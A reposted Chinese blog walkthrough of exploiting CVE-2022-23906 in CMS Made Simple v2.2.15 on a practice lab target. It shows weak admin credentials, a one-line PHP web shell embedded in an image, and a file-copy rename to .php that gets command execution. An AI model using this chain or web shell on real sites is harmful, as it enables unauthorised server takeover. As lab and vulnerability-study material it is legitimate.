CMS Made Simple v2.2.15远程命令执行漏洞（CVE-2022-23906）

2025/4/24 8:04:39 来源：https://blog.csdn.net/qq_45392044/article/details/145928953 浏览: 次关键词：CMS Made Simple v2.2.15远程命令执行漏洞（CVE-2022-23906）

CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。

春秋云镜中的漏洞靶标，CVE编号为CVE-2022-23906

后台/admin弱口令登录 admin/123456

文件管理这里可以上传文件

先上传一个php文件发现无法上传

发现可以更改文件名

修改文件名后缀为php失败

图片马可以上传，但是没法利用

<?php
system($_GET[777]);phpinfo();
?>

再试试copy复制文件

复制图片马，修改后缀为.php

直接访问/uploads/yjh.php去执行命令

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

相关资讯